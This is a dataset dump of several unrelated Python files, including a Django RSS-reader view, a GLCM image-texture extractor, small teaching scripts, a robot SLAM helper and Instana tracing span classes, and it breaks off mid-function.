data_prepare_proc()\n\ndict_to_epub_proc(epub_file,dict_aa)\n\nprint (\"*** 終了 ***\")\n# ----------------------------------------------------------\n","sub_path":"epub/jython/create/epub_create.py","file_name":"epub_create.py","file_ext":"py","file_size_in_byte":3113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"211110478","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.views.decorators.csrf import csrf_exempt\nimport urllib.request\nfrom barrapunto.models import Page\nfrom xml.sax.handler import ContentHandler\nfrom xml.sax import make_parser\n# Create your views here.\n\ncontent_Rss = \"\"\n\n\nclass myContentHandler(ContentHandler):\n texto = \"\"\n\n def __init__(self):\n self.inItem = False\n self.inContent = False\n self.theContent = \"\"\n\n def startElement(self, name, attrs):\n if name == 'item':\n self.inItem = True\n elif self.inItem:\n if name == 'title':\n self.inContent = True\n elif name == 'link':\n self.inContent = True\n\n def endElement(self, name):\n if name == 'item':\n self.inItem = False\n elif self.inItem:\n if name == 'title':\n self.texto += (\"

    Title: \" + self.theContent + \".

    \")\n # To avoid Unicode trouble\n self.inContent = False\n self.theContent = \"\"\n elif name == 'link':\n self.texto += (\"

    Link: \" + \"\" + self.theContent + \"

    \")\n self.inContent = False\n self.theContent = \"\"\n\n def characters(self, chars):\n if self.inContent:\n self.theContent = self.theContent + chars\n\n\ndef writeBase(request):\n respuesta = \"Listado de las paginas que tienes guardadas. \"\n lista_paginas = Page.objects.all()\n for pagina in lista_paginas:\n respuesta += \"
    \" + pagina.name + \" --> Id = \" + str(pagina.id)\n respuesta += \"
    Debe buscar por Id\"\n return HttpResponse(respuesta)\n\n\n@csrf_exempt\ndef pagina(request, identificador):\n if request.method == \"GET\":\n # Buscar en la base de datos\n try:\n pagina = Page.objects.get(id=identificador)\n # si existe\n respuesta = (\"
    \" + pagina.page + \"
    \" +\n content_Rss + \"
    \")\n except Page.DoesNotExist:\n # no existe\n respuesta = \"No existe la pagina con el ID = \" + str(identificador)\n\n elif request.method == \"PUT\":\n cuerpo = request.body.decode('utf-8')\n name, page = cuerpo.split(\",\")\n pagina = Page(name=name, page=page)\n pagina.save()\n respuesta = \"He detectado un PUT, Guardado en Base de datos\"\n else:\n respuesta = \"Metodo No Permitido\"\n return HttpResponse(respuesta)\n\n\ndef update(request):\n # detecto update\n global content_Rss\n theParser = make_parser()\n theHandler = myContentHandler()\n theParser.setContentHandler(theHandler)\n url = \"http://barrapunto.com/index.rss\"\n f = urllib.request.urlopen(url)\n theParser.parse(f)\n # saco el contetn_Rss\n content_Rss = theHandler.texto\n respuesta = (\"
    Noticias Barrapunto: \" + content_Rss +\n \"
    \")\n return HttpResponse(respuesta)\n\n\ndef notFound(request, rec):\n respuesta = \"Elemento \" + rec + \" no encontrado\"\n return HttpResponse(respuesta)\n","sub_path":"Version_2/myproject/barrapunto/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"442517849","text":"\"\"\"\n\n'Contrast' : 对比度 返回整幅图像中像素和它相邻像素之间的亮度反差。取值范围:[0,(GLCM行数-1)^2]。灰度一致的图 像,对比度为0。\n'Correlation' : 相关 返回整幅图像中像素与其相邻像素是如何相关的度量值。取值范围:[-1,1]。灰度一致的图像,相关性为NaN。\n'Energy' : 能量 返回GLCM中元素的平方和。取值范围:[0 1]。灰度一致的图像能量为1。\n'Homogemeity' : 同质性 返回度量GLCM中元素的分布到对角线紧密程度。取值范围:[0 1]。对角矩阵的同质性为1。\n\n\"\"\"\nimport cv2\nimport math\n\n# 定义最大灰度级数\ngray_level = 16\ndef maxGrayLevel(img):\n max_gray_level = 0\n (height, width) = img.shape\n print\n height, width\n for y in range(height):\n for x in range(width):\n if img[y][x] > max_gray_level:\n max_gray_level = img[y][x]\n return max_gray_level + 1\n\n\ndef getGlcm(input, d_x, d_y):\n srcdata = input.copy()\n ret = [[0.0 for i in range(gray_level)] for j in range(gray_level)]\n (height, width) = input.shape\n max_gray_level = maxGrayLevel(input)\n # 若灰度级数大于gray_level,则将图像的灰度级缩小至gray_level,减小灰度共生矩阵的大小\n if max_gray_level > gray_level:\n for j in range(height):\n for i in range(width):\n srcdata[j][i] = srcdata[j][i] * gray_level / max_gray_level\n\n for j in range(height - d_y):\n for i in range(width - d_x):\n rows = srcdata[j][i]\n cols = srcdata[j + d_y][i + d_x]\n ret[rows][cols] += 1.0\n\n for i in range(gray_level):\n for j in range(gray_level):\n ret[i][j] /= float(height * width)\n\n return ret\n\n\ndef feature_computer(p):\n Con = 0.0\n Eng = 0.0\n Asm = 0.0\n Idm = 0.0\n for i in range(gray_level):\n for j in range(gray_level):\n Con += (i - j) * (i - j) * p[i][j]\n Asm += p[i][j] * p[i][j]\n Idm += p[i][j] / (1 + (i - j) * (i - j))\n if p[i][j] > 0.0:\n Eng += p[i][j] * math.log(p[i][j])\n return Asm, Con, -Eng, Idm\n\n\n# def test(image_name):\n# img = cv2.imread(image_name)\n# try:\n# img_shape = img.shape\n# except:\n# print\n# 'imread error'\n# return\n# #双斜杠表示整数除法\n# img = cv2.resize(img, (img_shape[1]//2, img_shape[0]//2), interpolation=cv2.INTER_CUBIC)\n# img_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n# glcm_0 = getGlcm(img_gray, 1, 0)\n# glcm_1=getGlcm(img_gray, 0, 1)\n# glcm_2=getGlcm(img_gray, 1, 1)\n# glcm_3=getGlcm(img_gray, -1, 1)\n# asm0, con0, eng0, idm0 = feature_computer(glcm_0)\n# asm1, con1, eng1, idm1 = feature_computer(glcm_1)\n# asm2, con2, eng2, idm2 = feature_computer(glcm_2)\n# asm3, con3, eng3, idm3 = feature_computer(glcm_3)\n# return [asm0, con0, eng0, idm1, asm1, con1, eng1, idm2, asm2, con2, eng2, idm2, asm3, con3, eng3, idm3]\n\ndef glcminthis(img_gray):\n glcm_0 = getGlcm(img_gray, 1, 0)\n glcm_1 = getGlcm(img_gray, 0, 1)\n glcm_2 = getGlcm(img_gray, 1, 1)\n glcm_3 = getGlcm(img_gray, 1, 2)\n asm0, con0, eng0, idm0 = feature_computer(glcm_0)\n asm1, con1, eng1, idm1 = feature_computer(glcm_1)\n asm2, con2, eng2, idm2 = feature_computer(glcm_2)\n asm3, con3, eng3, idm3 = feature_computer(glcm_3)\n return [asm0, con0, eng0, idm1, asm1, con1, eng1, idm2, asm2, con2, eng2, idm2, asm3, con3, eng3, idm3]","sub_path":"glcm_extract.py","file_name":"glcm_extract.py","file_ext":"py","file_size_in_byte":3529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"64468030","text":"#Script to write maths tables based on user input\n#gets two inputs, i. Table number ii. Table limit value\nprint(\"Maths Tables Generator\")\nsuccess = False\n\n#Table calculation logic\ndef table_logic(x,y):\n for i in range(1,(y+1)):\n print(f'{i} X {x} = {x * i}')\n\nwhile not success:\n try:\n table_number = int(input(\"Enter the table number : \"))\n table_limit = int(input(\"Enter the end limit of the table : \"))\n if (table_number >= 0) & (table_limit >= 0):\n table_logic(table_number,table_limit)\n print(\"Table ends!\")\n success = True\n else:\n print(\"The input values should be a positive integer\")\n\n except ValueError:\n print(\"Expected only numerical values!\")\n","sub_path":"Tables.py","file_name":"Tables.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"247329263","text":"'''\n\n Online Python Compiler.\n Code, Compile, Run and Debug python program online.\nWrite your code in this editor and press \"Run\" button to execute it.\n\n'''\n\ndef is_goodNum(num):\n str_num = str(num)\n first = str_num[:2]\n second = str_num[2:]\n if int(second)>int(first):\n return True\n else: \n return False\n \ndef total_(num):\n total= 0\n last_digit = num%10\n if num ==0:\n return 0\n else :\n total += last_digit\n return total+total_(num//10)\n\ndef lucky_(num):\n if num in lucky:\n return \"lucky\"\n elif num in very_lucky:\n return \"very_lucky\"\n else:\n return\n\ndef is_fancy(num):\n lst = list(str(num))\n for i in lst:\n if lst.count(i)>=2:\n return True\n else:\n return False\n\ndef fancy_num(lst):\n count = 0\n for i in lst:\n #to check for fancy.\n if is_fancy(i):\n #to check for good number.\n if is_goodNum(i):\n summ = total_(i)\n #to check for luck.\n if (lucky_(summ)!=None):\n count+=1\n print(i,'-',summ,end = \" \")\n print(lucky_(summ),\"|\", summ+17,end = \" \")\n if summ+17 in lucky:\n print(\"lucky\")\n elif summ+17 in very_lucky:\n print(\"very lucky\")\n else :\n print(\"Not lucky\")\n \n else:\n print()\n print(\"Choose any one from \",count)\n\nlucky = (1,3,5,6,9,10,14,15,16,18,21,24,27,32,33,36,42,46,50,51)\nvery_lucky = (19,23,37,41,45)\n\nnumber = [x for x in range(7000,8501)]\nfancy_num(number)\n\n","sub_path":"fancy checker.py","file_name":"fancy checker.py","file_ext":"py","file_size_in_byte":1740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"27394859","text":"class Employee():\n pay_rise = 0.05\n\n\n def __init__(self, firstname, lastname, pay):\n self.f = firstname\n self.l = lastname\n self.p = pay\n \n print('this is a constructor')\n\n def salary(self):\n increase = self.p * self.pay_rise\n salary = increase + self.p\n return salary\n\n\n def details(self):\n return 'here is the product details'\n\ne1 = Employee('benedict', 'uwazie', 2000)\nprint(e1.salary())\n\nclass Developer(Employee):\n #pass\n def my_details(self):\n return f'my firstname is {self.f} and lastname {self.l}'\nd1 = Developer('alabi', 'adebayor', 4000)\nprint(d1.my_details())\nprint(d1.salary())\n\n \n\n","sub_path":"day3/inheritance.py","file_name":"inheritance.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"337945807","text":"from robot_class import Robot\nfrom math import *\nimport random\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport os\n\npath = os.getcwd()\n\ndef display_world(world_grid, position, landmarks=None):\n \n sns.set_style(\"dark\")\n world_size = np.zeros((world_grid+1, world_grid+1))\n ax=plt.gca()\n cols = world_grid+1\n rows = world_grid+1\n \n ax.set_xticks([x for x in range(1,cols)], minor=True)\n ax.set_yticks([y for y in range(1,rows)], minor=True)\n \n plt.grid(which='minor', ls='-', lw=1, color='white')\n plt.grid(which='major', ls='-', lw=2, color='white')\n \n ax.text(position[0], position[1], 'o', ha='center',\n va='center', color='r', fontsize=30)\n \n if (landmarks is not None):\n for pos in landmarks:\n if (pos != position):\n ax.text(pos[0], pos[1], 'x', ha='center', va='center',\n color='purple', fontsize=20)\n \n plt.show()\n \n\ndef save_display_world(i,world_grid, position, landmarks=None, next_point=None):\n\n sns.set_style(\"dark\")\n world_size = np.zeros((world_grid+1, world_grid+1))\n ax = plt.gca()\n cols = world_grid+1\n rows = world_grid+1\n\n ax.set_xticks([x for x in range(1, cols)], minor=True)\n ax.set_yticks([y for y in range(1, rows)], minor=True)\n\n plt.grid(which='minor', ls='-', lw=1, color='white')\n plt.grid(which='major', ls='-', lw=2, color='white')\n\n ax.text(position[0], position[1], 'o', ha='center',\n va='center', color='r', fontsize=30)\n\n if (landmarks is not None):\n for pos in landmarks:\n if (pos != position):\n ax.text(pos[0], pos[1], 'x', ha='center', va='center',\n color='purple', fontsize=20)\n\n if next_point[0] != 0:\n plt.plot([position[0], next_point[0]], [\n position[1], next_point[1]], linewidth=3)\n plt.annotate(i, (position[0],position[1]), textcoords='offset points',\n xytext=(0,10), ha='center', fontsize=30)\n plt.tick_params(axis='both', labelsize=20)\n #plt.arrow(position[0], position[1], next_point[0]/2, next_point[1]/2)\n \n\n plt.savefig(path+\"/2d movement/world_\"+i+\".png\")\n\n return \"2d World is Covered\"\n\n\ndef make_data(N, num_landmarks, world_grid, measurement_range,\n motion_noise, measurement_noise, distance):\n\n complete = False\n while not complete:\n data = []\n R = Robot(world_grid, measurement_range, motion_noise, measurement_noise)\n R.make_landmarks(num_landmarks)\n seen = [False for row in range(num_landmarks)]\n \n orientation = random.random() * 2.0 * pi\n dx = cos(orientation) * distance\n dy = sin(orientation) * distance\n \n for k in range(N-1):\n Z = R.sense()\n for i in range(len(Z)):\n seen[Z[i][0]] = True\n while not R.move(dx, dy):\n orientation = random.random() * 2.0 * pi\n dx = cos(orientation) * distance\n dy = sin(orientation) * distance\n \n data.append([Z, [dx, dy]])\n \n complete = (sum(seen) == num_landmarks)\n print(' ')\n print('Landmarks: ', R.landmarks)\n print(R)\n \n return data\n \n \n","sub_path":"SLAM/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":3332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"527832960","text":"import six\nimport sys\nfrom .log import logger\nfrom .util import DictionaryOfStan\nfrom basictracer.span import BasicSpan\nimport opentracing.ext.tags as ot_tags\n\n\nclass SpanContext():\n def __init__(\n self,\n trace_id=None,\n span_id=None,\n baggage=None,\n sampled=True,\n level=1,\n synthetic=False):\n\n self.level = level\n self.trace_id = trace_id\n self.span_id = span_id\n self.sampled = sampled\n self.synthetic = synthetic\n self._baggage = baggage or {}\n\n @property\n def baggage(self):\n return self._baggage\n\n def with_baggage_item(self, key, value):\n new_baggage = self._baggage.copy()\n new_baggage[key] = value\n return SpanContext(\n trace_id=self.trace_id,\n span_id=self.span_id,\n sampled=self.sampled,\n baggage=new_baggage)\n\n\nclass InstanaSpan(BasicSpan):\n stack = None\n synthetic = False\n\n def finish(self, finish_time=None):\n super(InstanaSpan, self).finish(finish_time)\n\n def set_tag(self, key, value):\n # Key validation\n if not isinstance(key, six.text_type) and not isinstance(key, six.string_types) :\n logger.debug(\"(non-fatal) span.set_tag: tag names must be strings. tag discarded for %s\", type(key))\n return self\n\n final_value = value\n value_type = type(value)\n\n # Value validation\n if value_type in [bool, float, int, list, str]:\n return super(InstanaSpan, self).set_tag(key, final_value)\n\n elif isinstance(value, six.text_type):\n final_value = str(value)\n\n else:\n try:\n final_value = repr(value)\n except:\n final_value = \"(non-fatal) span.set_tag: values must be one of these types: bool, float, int, list, \" \\\n \"set, str or alternatively support 'repr'. tag discarded\"\n logger.debug(final_value, exc_info=True)\n return self\n\n return super(InstanaSpan, self).set_tag(key, final_value)\n\n def mark_as_errored(self, tags = None):\n \"\"\"\n Mark this span as errored.\n\n @param tags: optional tags to add to the span\n \"\"\"\n try:\n ec = self.tags.get('ec', 0)\n self.set_tag('ec', ec + 1)\n\n if tags is not None and type(tags) is dict:\n for key in tags:\n self.set_tag(key, tags[key])\n except Exception:\n logger.debug('span.mark_as_errored', exc_info=True)\n\n def assure_errored(self):\n \"\"\"\n Make sure that this span is marked as errored.\n @return: None\n \"\"\"\n try:\n ec = self.tags.get('ec', None)\n if ec is None or ec == 0:\n self.set_tag('ec', 1)\n except Exception:\n logger.debug('span.assure_errored', exc_info=True)\n\n def log_exception(self, e):\n \"\"\"\n Log an exception onto this span. This will log pertinent info from the exception and\n assure that this span is marked as errored.\n\n @param e: the exception to log\n \"\"\"\n try:\n message = \"\"\n self.mark_as_errored()\n\n if hasattr(e, '__str__') and len(str(e)) > 0:\n message = str(e)\n elif hasattr(e, 'message') and e.message is not None:\n message = e.message\n else:\n message = repr(e)\n\n if self.operation_name in ['rpc-server', 'rpc-client']:\n self.set_tag('rpc.error', message)\n elif self.operation_name == \"mysql\":\n self.set_tag('mysql.error', message)\n elif self.operation_name == \"postgres\":\n self.set_tag('pg.error', message)\n elif self.operation_name in RegisteredSpan.HTTP_SPANS:\n self.set_tag('http.error', message)\n elif self.operation_name in [\"celery-client\", \"celery-worker\"]:\n self.set_tag('error', message)\n else:\n self.log_kv({'message': message})\n except Exception:\n logger.debug(\"span.log_exception\", exc_info=True)\n raise\n\n def collect_logs(self):\n \"\"\"\n Collect up log data and feed it to the Instana brain.\n\n :param span: The span to search for logs in\n :return: Logs ready for consumption by the Instana brain.\n \"\"\"\n logs = {}\n for log in self.logs:\n ts = int(round(log.timestamp * 1000))\n if ts not in logs:\n logs[ts] = {}\n\n if 'message' in log.key_values:\n logs[ts]['message'] = log.key_values['message']\n if 'event' in log.key_values:\n logs[ts]['event'] = log.key_values['event']\n if 'parameters' in log.key_values:\n logs[ts]['parameters'] = log.key_values['parameters']\n\n return logs\n\n\nclass BaseSpan(object):\n sy = None\n \n def __str__(self):\n return \"BaseSpan(%s)\" % self.__dict__.__str__()\n\n def __repr__(self):\n return self.__dict__.__str__()\n\n def __init__(self, span, source, service_name, **kwargs):\n self.t = span.context.trace_id\n self.p = span.parent_id\n self.s = span.context.span_id\n self.ts = int(round(span.start_time * 1000))\n self.d = int(round(span.duration * 1000))\n self.f = source\n self.ec = span.tags.pop('ec', None)\n self.data = DictionaryOfStan()\n\n if span.synthetic:\n self.sy = True\n\n if span.stack:\n self.stack = span.stack\n\n self.__dict__.update(kwargs)\n\n\nclass SDKSpan(BaseSpan):\n ENTRY_KIND = [\"entry\", \"server\", \"consumer\"]\n EXIT_KIND = [\"exit\", \"client\", \"producer\"]\n\n def __init__(self, span, source, service_name, **kwargs):\n super(SDKSpan, self).__init__(span, source, service_name, **kwargs)\n\n span_kind = self.get_span_kind(span)\n\n self.n = \"sdk\"\n self.k = span_kind[1]\n\n if self.k == 1 and service_name is not None:\n self.data[\"service\"] = service_name\n\n self.data[\"sdk\"][\"name\"] = span.operation_name\n self.data[\"sdk\"][\"type\"] = span_kind[0]\n self.data[\"sdk\"][\"custom\"][\"tags\"] = span.tags\n self.data[\"sdk\"][\"custom\"][\"logs\"] = span.logs\n\n if \"arguments\" in span.tags:\n self.data.sdk.arguments = span.tags[\"arguments\"]\n\n if \"return\" in span.tags:\n self.data.sdk.Return = span.tags[\"return\"]\n\n if len(span.context.baggage) > 0:\n self.data[\"baggage\"] = span.context.baggage\n\n def get_span_kind(self, span):\n \"\"\"\n Will retrieve the `span.kind` tag and return a tuple containing the appropriate string and integer\n values for the Instana backend\n\n :param span: The span to search for the `span.kind` tag\n :return: Tuple (String, Int)\n \"\"\"\n kind = (\"intermediate\", 3)\n if \"span.kind\" in span.tags:\n if span.tags[\"span.kind\"] in self.ENTRY_KIND:\n kind = (\"entry\", 1)\n elif span.tags[\"span.kind\"] in self.EXIT_KIND:\n kind = (\"exit\", 2)\n return kind\n\n\nclass RegisteredSpan(BaseSpan):\n HTTP_SPANS = (\"aiohttp-client\", \"aiohttp-server\", \"django\", \"http\", \"soap\", \"tornado-client\",\n \"tornado-server\", \"urllib3\", \"wsgi\")\n\n EXIT_SPANS = (\"aiohttp-client\", \"cassandra\", \"celery-client\", \"couchbase\", \"log\", \"memcache\",\n \"mongo\", \"mysql\", \"postgres\", \"rabbitmq\", \"redis\", \"rpc-client\", \"sqlalchemy\",\n \"soap\", \"tornado-client\", \"urllib3\", \"pymongo\")\n\n ENTRY_SPANS = (\"aiohttp-server\", \"aws.lambda.entry\", \"celery-worker\", \"django\", \"wsgi\", \"rabbitmq\",\n \"rpc-server\", \"tornado-server\")\n\n LOCAL_SPANS = (\"render\")\n\n def __init__(self, span, source, service_name, **kwargs):\n super(RegisteredSpan, self).__init__(span, source, service_name, **kwargs)\n self.n = span.operation_name\n\n self.k = 1\n if span.operation_name in self.ENTRY_SPANS:\n # entry\n self._populate_entry_span_data(span)\n self.data[\"service\"] = service_name\n elif span.operation_name in self.EXIT_SPANS:\n self.k = 2 # exit\n self._populate_exit_span_data(span)\n elif span.operation_name in self.LOCAL_SPANS:\n self.k = 3 # intermediate span\n self._populate_local_span_data(span)\n\n if \"rabbitmq\" in self.data and self.data[\"rabbitmq\"][\"sort\"] == \"consume\":\n self.k = 1 # entry\n\n # Store any leftover tags in the custom section\n if len(span.tags):\n self.data[\"custom\"][\"tags\"] = span.tags\n\n def _populate_entry_span_data(self, span):\n if span.operation_name in self.HTTP_SPANS:\n self._collect_http_tags(span)\n\n elif span.operation_name == \"aws.lambda.entry\":\n self.data[\"lambda\"][\"arn\"] = span.tags.pop('lambda.arn', \"Unknown\")\n self.data[\"lambda\"][\"alias\"] = None\n self.data[\"lambda\"][\"runtime\"] = \"python\"\n self.data[\"lambda\"][\"functionName\"] = span.tags.pop('lambda.name', \"Unknown\")\n self.data[\"lambda\"][\"functionVersion\"] = span.tags.pop('lambda.version', \"Unknown\")\n self.data[\"lambda\"][\"trigger\"] = span.tags.pop('lambda.trigger', None)\n self.data[\"lambda\"][\"error\"] = None\n\n trigger_type = self.data[\"lambda\"][\"trigger\"]\n\n if trigger_type in [\"aws:api.gateway\", \"aws:application.load.balancer\"]:\n self._collect_http_tags(span)\n elif trigger_type == 'aws:cloudwatch.events':\n self.data[\"lambda\"][\"cw\"][\"events\"][\"id\"] = span.tags.pop('data.lambda.cw.events.id', None)\n self.data[\"lambda\"][\"cw\"][\"events\"][\"more\"] = span.tags.pop('lambda.cw.events.more', False)\n self.data[\"lambda\"][\"cw\"][\"events\"][\"resources\"] = span.tags.pop('lambda.cw.events.resources', None)\n\n elif trigger_type == 'aws:cloudwatch.logs':\n self.data[\"lambda\"][\"cw\"][\"logs\"][\"group\"] = span.tags.pop('lambda.cw.logs.group', None)\n self.data[\"lambda\"][\"cw\"][\"logs\"][\"stream\"] = span.tags.pop('lambda.cw.logs.stream', None)\n self.data[\"lambda\"][\"cw\"][\"logs\"][\"more\"] = span.tags.pop('lambda.cw.logs.more', None)\n self.data[\"lambda\"][\"cw\"][\"logs\"][\"events\"] = span.tags.pop('lambda.cw.logs.events', None)\n\n elif trigger_type == 'aws:s3':\n self.data[\"lambda\"][\"s3\"][\"events\"] = span.tags.pop('lambda.s3.events', None)\n elif trigger_type == 'aws:sqs':\n self.data[\"lambda\"][\"sqs\"][\"messages\"] = span.tags.pop('lambda.sqs.messages', None)\n\n elif span.operation_name == \"celery-worker\":\n self.data[\"celery\"][\"task\"] = span.tags.pop('task', None)\n self.data[\"celery\"][\"task_id\"] = span.tags.pop('task_id', None)\n self.data[\"celery\"][\"scheme\"] = span.tags.pop('scheme', None)\n self.data[\"celery\"][\"host\"] = span.tags.pop('host', None)\n self.data[\"celery\"][\"port\"] = span.tags.pop('port', None)\n self.data[\"celery\"][\"retry-reason\"] = span.tags.pop('retry-reason', None)\n self.data[\"celery\"][\"error\"] = span.tags.pop('error', None)\n\n elif span.operation_name == \"rabbitmq\":\n self.data[\"rabbitmq\"][\"exchange\"] = span.tags.pop('exchange', None)\n self.data[\"rabbitmq\"][\"queue\"] = span.tags.pop('queue', None)\n self.data[\"rabbitmq\"][\"sort\"] = span.tags.pop('sort', None)\n self.data[\"rabbitmq\"][\"address\"] = span.tags.pop('address', None)\n self.data[\"rabbitmq\"][\"key\"] = span.tags.pop('key', None)\n\n elif span.operation_name == \"rpc-server\":\n self.data[\"rpc\"][\"flavor\"] = span.tags.pop('rpc.flavor', None)\n self.data[\"rpc\"][\"host\"] = span.tags.pop('rpc.host', None)\n self.data[\"rpc\"][\"port\"] = span.tags.pop('rpc.port', None)\n self.data[\"rpc\"][\"call\"] = span.tags.pop('rpc.call', None)\n self.data[\"rpc\"][\"call_type\"] = span.tags.pop('rpc.call_type', None)\n self.data[\"rpc\"][\"params\"] = span.tags.pop('rpc.params', None)\n self.data[\"rpc\"][\"baggage\"] = span.tags.pop('rpc.baggage', None)\n self.data[\"rpc\"][\"error\"] = span.tags.pop('rpc.error', None)\n else:\n logger.debug(\"SpanRecorder: Unknown entry span: %s\" % span.operation_name)\n\n def _populate_local_span_data(self, span):\n if span.operation_name == \"render\":\n self.data[\"render\"][\"name\"] = span.tags.pop('name', None)\n self.data[\"render\"][\"type\"] = span.tags.pop('type', None)\n self.data[\"log\"][\"message\"] = span.tags.pop('message', None)\n self.data[\"log\"][\"parameters\"] = span.tags.pop('parameters', None)\n else:\n logger.debug(\"SpanRecorder: Unknown local span: %s\" % span.operation_name)\n\n def _populate_exit_span_data(self, span):\n if span.operation_name in self.HTTP_SPANS:\n self._collect_http_tags(span)\n\n elif span.operation_name == \"cassandra\":\n self.data[\"cassandra\"][\"cluster\"] = span.tags.pop('cassandra.cluster', None)\n self.data[\"cassandra\"][\"query\"] = span.tags.pop('cassandra.query', None)\n self.data[\"cassandra\"][\"keyspace\"] = span.tags.pop('cassandra.keyspace', None)\n self.data[\"cassandra\"][\"fetchSize\"] = span.tags.pop('cassandra.fetchSize', None)\n self.data[\"cassandra\"][\"achievedConsistency\"] = span.tags.pop('cassandra.achievedConsistency', None)\n self.data[\"cassandra\"][\"triedHosts\"] = span.tags.pop('cassandra.triedHosts', None)\n self.data[\"cassandra\"][\"fullyFetched\"] = span.tags.pop('cassandra.fullyFetched', None)\n self.data[\"cassandra\"][\"error\"] = span.tags.pop('cassandra.error', None)\n\n elif span.operation_name == \"celery-client\":\n self.data[\"celery\"][\"task\"] = span.tags.pop('task', None)\n self.data[\"celery\"][\"task_id\"] = span.tags.pop('task_id', None)\n self.data[\"celery\"][\"scheme\"] = span.tags.pop('scheme', None)\n self.data[\"celery\"][\"host\"] = span.tags.pop('host', None)\n self.data[\"celery\"][\"port\"] = span.tags.pop('port', None)\n self.data[\"celery\"][\"error\"] = span.tags.pop('error', None)\n\n elif span.operation_name == \"couchbase\":\n self.data[\"couchbase\"][\"hostname\"] = span.tags.pop('couchbase.hostname', None)\n self.data[\"couchbase\"][\"bucket\"] = span.tags.pop('couchbase.bucket', None)\n self.data[\"couchbase\"][\"type\"] = span.tags.pop('couchbase.type', None)\n self.data[\"couchbase\"][\"error\"] = span.tags.pop('couchbase.error', None)\n self.data[\"couchbase\"][\"error_type\"] = span.tags.pop('couchbase.error_type', None)\n self.data[\"couchbase\"][\"sql\"] = span.tags.pop('couchbase.sql', None)\n\n elif span.operation_name == \"rabbitmq\":\n self.data[\"rabbitmq\"][\"exchange\"] = span.tags.pop('exchange', None)\n self.data[\"rabbitmq\"][\"queue\"] = span.tags.pop('queue', None)\n self.data[\"rabbitmq\"][\"sort\"] = span.tags.pop('sort', None)\n self.data[\"rabbitmq\"][\"address\"] = span.tags.pop('address', None)\n self.data[\"rabbitmq\"][\"key\"] = span.tags.pop('key', None)\n\n elif span.operation_name == \"redis\":\n self.data[\"redis\"][\"connection\"] = span.tags.pop('connection', None)\n self.data[\"redis\"][\"driver\"] = span.tags.pop('driver', None)\n self.data[\"redis\"][\"command\"] = span.tags.pop('command', None)\n self.data[\"redis\"][\"error\"] = span.tags.pop('redis.error', None)\n self.data[\"redis\"][\"subCommands\"] = span.tags.pop('subCommands', None)\n\n elif span.operation_name == \"rpc-client\":\n self.data[\"rpc\"][\"flavor\"] = span.tags.pop('rpc.flavor', None)\n self.data[\"rpc\"][\"host\"] = span.tags.pop('rpc.host', None)\n self.data[\"rpc\"][\"port\"] = span.tags.pop('rpc.port', None)\n self.data[\"rpc\"][\"call\"] = span.tags.pop('rpc.call', None)\n self.data[\"rpc\"][\"call_type\"] = span.tags.pop('rpc.call_type', None)\n self.data[\"rpc\"][\"params\"] = span.tags.pop('rpc.params', None)\n self.data[\"rpc\"][\"baggage\"] = span.tags.pop('rpc.baggage', None)\n self.data[\"rpc\"][\"error\"] = span.tags.pop('rpc.error', None)\n\n elif span.operation_name == \"sqlalchemy\":\n self.data[\"sqlalchemy\"][\"sql\"] = span.tags.pop('sqlalchemy.sql', None)\n self.data[\"sqlalchemy\"][\"eng\"] = span.tags.pop('sqlalchemy.eng', None)\n self.data[\"sqlalchemy\"][\"url\"] = span.tags.pop('sqlalchemy.url', None)\n self.data[\"sqlalchemy\"][\"err\"] = span.tags.pop('sqlalchemy.err', None)\n\n elif span.operation_name == \"mysql\":\n self.data[\"mysql\"][\"host\"] = span.tags.pop('host', None)\n self.data[\"mysql\"][\"port\"] = span.tags.pop('port', None)\n self.data[\"mysql\"][\"db\"] = span.tags.pop(ot_tags.DATABASE_INSTANCE, None)\n self.data[\"mysql\"][\"user\"] = span.tags.pop(ot_tags.DATABASE_USER, None)\n self.data[\"mysql\"][\"stmt\"] = span.tags.pop(ot_tags.DATABASE_STATEMENT, None)\n self.data[\"mysql\"][\"error\"] = span.tags.pop('mysql.error', None)\n\n elif span.operation_name == \"postgres\":\n self.data[\"pg\"][\"host\"] = span.tags.pop('host', None)\n self.data[\"pg\"][\"port\"] = span.tags.pop('port', None)\n self.data[\"pg\"][\"db\"] = span.tags.pop(ot_tags.DATABASE_INSTANCE, None)\n self.data[\"pg\"][\"user\"] = span.tags.pop(ot_tags.DATABASE_USER, None)\n self.data[\"pg\"][\"stmt\"] = span.tags.pop(ot_tags.DATABASE_STATEMENT, None)\n self.data[\"pg\"][\"error\"] = span.tags.pop('pg.error', None)\n\n elif span.operation_name == \"mongo\":\n service = \"%s:%s\" % (span.tags.pop('host', None), span.tags.pop('port', None))\n namespace = \"%s.%s\" % (span.tags.pop('db', \"?\"), span.tags.pop('collection', \"?\"))\n\n self.data[\"mongo\"][\"service\"] = service\n self.data[\"mongo\"][\"namespace\"] = namespace\n self.data[\"mongo\"][\"command\"] = span.tags.pop('command', None)\n self.data[\"mongo\"][\"filter\"] = span.tags.pop('filter', None)\n self.data[\"mongo\"][\"json\"] = span.tags.pop('json', None)\n self.data[\"mongo\"][\"error\"] = span.tags.pop('error', None)\n\n elif span.operation_name == \"log\":\n # use last special key values\n for l in span.logs:\n if \"message\" in l.key_values:\n self.data[\"log\"][\"message\"] = l.key_values.pop(\"message\", None)\n if \"parameters\" in l.key_values:\n self.data[\"log\"][\"parameters\"] = l.key_values.pop(\"parameters\", None)\n else:\n logger.debug(\"SpanRecorder: Unknown exit span: %s\" % span.operation_name)\n\n def _collect_http_tags(self, span):\n self.data[\"http\"][\"host\"] = span.tags.pop(\"http.host\", None)\n 